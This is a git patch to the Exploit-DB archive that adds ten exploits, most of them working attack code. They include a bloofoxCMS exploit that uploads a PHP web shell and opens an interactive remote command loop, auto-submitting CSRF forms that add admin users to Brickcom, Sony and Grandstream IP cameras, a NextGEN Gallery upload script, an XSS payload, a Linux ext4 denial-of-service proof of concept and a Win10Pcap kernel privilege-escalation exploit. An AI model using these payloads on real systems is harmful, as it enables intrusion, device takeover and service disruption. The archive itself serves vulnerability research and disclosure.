From 6123605b39c6285c7af81952b469ed2d06e50153 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 1 Nov 2015 05:01:56 +0000
Subject: [PATCH] DB: 2015-11-01

10 new exploits
---
 files.csv                            |   9 ++
 platforms/android/remote/38586.txt   |   9 ++
 platforms/hardware/remote/38582.html |  20 +++
 platforms/hardware/remote/38583.html |  26 ++++
 platforms/hardware/remote/38584.txt  |   7 +
 platforms/linux/dos/38589.c          |  58 ++++++++
 platforms/multiple/remote/38587.txt  |   7 +
 platforms/php/webapps/38585.pl       |  30 ++++
 platforms/php/webapps/38588.php      | 137 ++++++++++++++++++
 platforms/php/webapps/38590.txt      |   9 ++
 platforms/windows/local/38542.cpp    | 205 +++++++++++++++++++++++++++
 11 files changed, 517 insertions(+)
 create mode 100755 platforms/android/remote/38586.txt
 create mode 100755 platforms/hardware/remote/38582.html
 create mode 100755 platforms/hardware/remote/38583.html
 create mode 100755 platforms/hardware/remote/38584.txt
 create mode 100755 platforms/linux/dos/38589.c
 create mode 100755 platforms/multiple/remote/38587.txt
 create mode 100755 platforms/php/webapps/38585.pl
 create mode 100755 platforms/php/webapps/38588.php
 create mode 100755 platforms/php/webapps/38590.txt
 create mode 100755 platforms/windows/local/38542.cpp

diff --git a/files.csv b/files.csv
index 7630f851b..3304c644e 100755
--- a/files.csv
+++ b/files.csv
@@ -34855,3 +34855,12 @@ id,file,description,date,author,platform,type,port
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0
+38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0
+38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability",2013-06-12,"Marcos Garcia",php,webapps,0
+38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection Vulnerability",2013-06-15,"Ismail Kaleem",android,remote,0
+38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass Vulnerability",2013-06-14,felipensp,multiple,remote,0
+38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
+38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
+38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0
diff --git a/platforms/android/remote/38586.txt b/platforms/android/remote/38586.txt
new file mode 100755
index 000000000..6a5235e2b
--- /dev/null
+++ b/platforms/android/remote/38586.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60566/info
+
+TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected. 
+
+<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script> 
\ No newline at end of file
diff --git a/platforms/hardware/remote/38582.html b/platforms/hardware/remote/38582.html
new file mode 100755
index 000000000..8cd6022e9
--- /dev/null
+++ b/platforms/hardware/remote/38582.html
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/60526/info
+
+Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. 
+
+<html>
+<body>
+<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
+<input type="hidden" name="action" value="add">
+<input type="hidden" name="index" value="0">
+<input type="hidden" name="username" value="test2">
+<input type="hidden" name="password" value="test2">
+<input type="hidden" name="privilege" value="1">
+<script>document.gobap.submit();</script>
+</form>
+</body>
+</html> 
\ No newline at end of file
diff --git a/platforms/hardware/remote/38583.html b/platforms/hardware/remote/38583.html
new file mode 100755
index 000000000..c745a521a
--- /dev/null
+++ b/platforms/hardware/remote/38583.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/60529/info
+
+Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
+
+<html>
+<body>
+  <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
+    <input type="Select" name="ViewerModeDefault" value="00000fff">
+    <input type="Hidden" name="ViewerAuthen" value="off">
+    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
+    <input type="Hidden" name="User1" value="xxxx,c0000fff">
+    <input type="Hidden" name="User2" value="xxxx,c0000fff">
+    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
+    <input type="Hidden" name="User4" value="Og==,00000fff">
+    <input type="Hidden" name="User5" value="Og==,00000fff">
+    <input type="Hidden" name="User6" value="Og==,00000fff">
+    <input type="Hidden" name="User7" value="Og==,00000fff">
+    <input type="Hidden" name="User8" value="Og==,00000fff">
+    <input type="Hidden" name="User9" value="Og==,00000fff">
+    <input type="Hidden" name="Reload" value="referer">
+    <script>document.SonyCsRf.submit();</script>
+ </form>
+</body>
+</html>
diff --git a/platforms/hardware/remote/38584.txt b/platforms/hardware/remote/38584.txt
new file mode 100755
index 000000000..346f8b055
--- /dev/null
+++ b/platforms/hardware/remote/38584.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60532/info
+
+Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
+
+http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 
\ No newline at end of file
diff --git a/platforms/linux/dos/38589.c b/platforms/linux/dos/38589.c
new file mode 100755
index 000000000..69106af0c
--- /dev/null
+++ b/platforms/linux/dos/38589.c
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/60586/info
+
+The Linux Kernel is prone to a local denial-of-service vulnerability.
+
+Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions. 
+
+/*
+** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
+** Jonathan Salwan - 2013-06-05
+*/
+
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/fs.h>
+#include <stdio.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+struct ext4_new_group_input {
+        __u32 group;
+        __u64 block_bitmap;
+        __u64 inode_bitmap;
+        __u64 inode_table;
+        __u32 blocks_count;
+        __u16 reserved_blocks;
+        __u16 unused;
+};
+
+#define EXT4_IOC_GROUP_ADD  _IOW('f', 8, struct ext4_new_group_input)
+
+int main(int ac, const char *av[]){
+  struct ext4_new_group_input input;
+  int fd;
+
+  if (ac < 2){
+    printf("Syntax  : %s <ext4 device>\n", av[0]);
+    printf("Example : %s /tmp\n", av[0]);
+    return -1;
+  }
+
+  printf("[+] Opening the ext4 device\n");
+  if ((fd = open(av[1], O_RDONLY)) < 0){
+    perror("[-] open");
+    return -1;
+  }
+
+  printf("[+] Trigger the infinite loop\n");
+  input.group = -1;
+  if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
+    perror("[-] ioctl");
+  }
+
+  close(fd);
+  return 0;
+}
+
+
diff --git a/platforms/multiple/remote/38587.txt b/platforms/multiple/remote/38587.txt
new file mode 100755
index 000000000..3d8a6bc56
--- /dev/null
+++ b/platforms/multiple/remote/38587.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60569/info
+
+The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks 
+
+http://www.example.com/%2ftest/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/38585.pl b/platforms/php/webapps/38585.pl
new file mode 100755
index 000000000..76ffd6838
--- /dev/null
+++ b/platforms/php/webapps/38585.pl
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/60533/info
+
+The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. 
+
+#! /usr/bin/perl 
+use LWP; 
+use HTTP::Request::Common; 
+
+my ($url, $file) = @ARGV; 
+
+my $ua = LWP::UserAgent->new(); 
+my $req = POST $url, 
+Content_Type => 'form-data', 
+Content => [. 
+name => $name, 
+galleryselect => 1, # Gallery ID, should exist 
+Filedata => [ "$file", "file.gif", Content_Type => 
+'image/gif' ] 
+]; 
+my $res = $ua->request( $req ); 
+if( $res->is_success ) { 
+print $res->content; 
+} else { 
+print $res->status_line, "\n"; 
+} 
+
diff --git a/platforms/php/webapps/38588.php b/platforms/php/webapps/38588.php
new file mode 100755
index 000000000..4c74cd9d5
--- /dev/null
+++ b/platforms/php/webapps/38588.php
@@ -0,0 +1,137 @@
+source: http://www.securityfocus.com/bid/60585/info
+
+bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected. 
+
+<?php
+ 
+/*
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /        
+  / XXXXXX /
+ (________(          
+  `------'
+  
+ Exploit Title   : Bloofox CMS Unrestricted File Upload Exploit
+ Date            : 17 June 2013
+ Exploit Author  : CWH Underground
+ Site            : www.2600.in.th
+ Vendor Homepage : http://www.bloofox.com/
+ Software Link   : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
+ Version         : 0.5.0
+ Tested on       : Window and Linux
+  
+  
+#####################################################
+VULNERABILITY: Unrestricted File Upload 
+#####################################################
+  
+ This application has an upload feature that allows an authenticated user
+with Administrator roles or Editor roles to upload arbitrary files to media
+directory cause remote code execution by simply request it.
+
+ 
+#####################################################
+EXPLOIT
+#####################################################
+  
+*/
+ 
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+ 
+function http_send($host, $packet)
+{
+    if (!($sock = fsockopen($host, 80)))
+        die("\n[-] No response from {$host}:80\n");
+  
+    fputs($sock, $packet);
+    return stream_get_contents($sock);
+}
+
+
+  
+if ($argc < 3)
+{
+print "\n==============================================\n";
+print "  Bloofox CMS Unrestricted File Upload Exploit  \n";
+print "                                              \n";
+print "        Discovered By CWH Underground         \n";
+print "==============================================\n\n";
+print "  ,--^----------,--------,-----,-------^--,   \n";
+print "  | |||||||||   `--------'     |          O   \n";
+print "  `+---------------------------^----------|   \n";
+print "    `\_,-------, _________________________|   \n";
+print "      / XXXXXX /`|     /                      \n";
+print "     / XXXXXX /  `\   /                       \n";
+print "    / XXXXXX /\______(                        \n";
+print "   / XXXXXX /                                 \n";
+print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+print " (________(                                   \n";
+print "  `------'                                    \n\n";
+print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
+print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
+    die();
+}
+ 
+$host = $argv[1];
+$path = $argv[2];
+
+$payload = "username={$argv[3]}&password={$argv[4]}&action=login";
+
+$packet  = "POST {$path}admin/index.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+
+$response = http_send($host, $packet);
+
+if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
+if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
+
+print "\n..:: Login Successful ::..\n";
+print "\n..::   Waiting hell   ::..\n\n";
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
+$payload .= "Content-Type: application/octet-stream\r\n\r\n";
+$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet  = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
+$packet .= "Cookie: {$sid[1]}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+     
+http_send($host, $packet);
+ 
+$packet  = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+     
+while(1)
+{
+    print "\nBloofox-shell# ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
+    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
+ 
+?>
diff --git a/platforms/php/webapps/38590.txt b/platforms/php/webapps/38590.txt
new file mode 100755
index 000000000..0bc7c292f
--- /dev/null
+++ b/platforms/php/webapps/38590.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60660/info
+
+et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
+
+An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+et-chat 3.07 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/chat/?AdminRegUserEdit&admin&id=4 
\ No newline at end of file
diff --git a/platforms/windows/local/38542.cpp b/platforms/windows/local/38542.cpp
new file mode 100755
index 000000000..1361d870b
--- /dev/null
+++ b/platforms/windows/local/38542.cpp
@@ -0,0 +1,205 @@
+# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+
+/*
+Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
+
+you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
+
+IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
+
+ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
+
+overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
+*/
+
+#include <stdio.h>
+#include <tchar.h>
+#include<Windows.h>
+#include<stdio.h>
+#include <winternl.h>
+#include <intrin.h>
+#include <psapi.h>
+#include <strsafe.h>
+#include <assert.h>
+
+#define	SL_IOCTL_GET_EVENT_NAME		CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xc0000004L)
+
+/* found with :
+!token 
+1: kd> dt nt!_OBJECT_HEADER
+   +0x000 PointerCount     : Int4B
+   +0x004 HandleCount      : Int4B
+   +0x004 NextToFree       : Ptr32 Void
+   +0x008 Lock             : _EX_PUSH_LOCK
+   +0x00c TypeIndex        : UChar
+   +0x00d TraceFlags       : UChar
+   +0x00e InfoMask         : UChar
+   +0x00f Flags            : UChar
+   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+   +0x010 QuotaBlockCharged : Ptr32 Void
+   +0x014 SecurityDescriptor : Ptr32 Void
+   +0x018 Body             : _QUAD
+
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN				0x5
+
+
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation = 
+(SYSTEM_INFORMATION_CLASS)16;
+
+// The NtQuerySystemInformation function and the structures that it returns 
+// are internal to the operating system and subject to change from one 
+// release of Windows to another. To maintain the compatibility of your 
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	OUT PVOID SystemInformation,
+	IN ULONG SystemInformationLength,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE 
+{
+	ULONG ProcessId;
+	UCHAR ObjectTypeNumber;
+	UCHAR Flags;
+	USHORT Handle;
+	PVOID Object;
+	ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION 
+{
+	ULONG NumberOfHandles;
+	SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation = 
+(FILE_INFORMATION_CLASS)9;
+
+// The NtQueryInformationFile function and the structures that it returns 
+// are internal to the operating system and subject to change from one 
+// release of Windows to another. To maintain the compatibility of your 
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+	IN HANDLE FileHandle,
+	OUT PIO_STATUS_BLOCK IoStatusBlock,
+	OUT PVOID FileInformation,
+	IN ULONG Length,
+	IN FILE_INFORMATION_CLASS FileInformationClass
+	);
+
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+	ULONG FileNameLength;
+	WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+
+void* FindTokenAddressHandles(ULONG pid)
+{
+	/////////////////////////////////////////////////////////////////////////
+	// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+	// 
+
+	// The functions have no associated import library. You must use the 
+	// LoadLibrary and GetProcAddress functions to dynamically link to 
+	// ntdll.dll.
+
+	HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+	assert(hNtDll != NULL);
+
+	PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = 
+		(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, 
+		"NtQuerySystemInformation");
+	assert(NtQuerySystemInformation != NULL);
+
+
+	/////////////////////////////////////////////////////////////////////////
+	// Get system handle information.
+	// 
+
+	DWORD nSize = 4096, nReturn;
+	PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+		HeapAlloc(GetProcessHeap(), 0, nSize);
+
+	// NtQuerySystemInformation does not return the correct required buffer 
+	// size if the buffer passed is too small. Instead you must call the 
+	// function while increasing the buffer size until the function no longer 
+	// returns STATUS_INFO_LENGTH_MISMATCH.
+	while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, 
+		nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+		nSize += 4096;
+		pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+			GetProcessHeap(), 0, nSize);
+	}
+
+	for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+	{
+
+		PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+
+		if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+		{
+			printf(" ObjectTypeNumber %d , ProcessId %d , Object  %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+			return pHandle->Object;
+		}
+	}
+
+	/////////////////////////////////////////////////////////////////////////
+	// Clean up.
+	// 
+	HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+
+	return 0;
+}
+
+void main()
+{
+	DWORD dwBytesReturned;
+	DWORD ShellcodeFakeMemory;
+	HANDLE token;
+
+
+	// first create toke handle so find  object address with handle 
+	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+		DebugBreak();
+	
+	void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+
+	CloseHandle(token);
+
+	// i dont want write fully weaponized exploit so criminal must write code to find  "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)  
+	HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+  if(hDriver!=INVALID_HANDLE_VALUE)
+  {
+	   fprintf(stderr," Open Driver OK\n");
+
+	  if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+	  {
+		  fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+		  return;
+	  }
+	  else  fprintf(stderr," Send IOCTL OK\n");
+  }
+
+  else 
+  {
+	  fprintf(stderr," Open Driver error %d.\n",GetLastError());
+	  return;
+  }
+
+
+  CloseHandle(hDriver);
+  getchar();
+
+}
\ No newline at end of file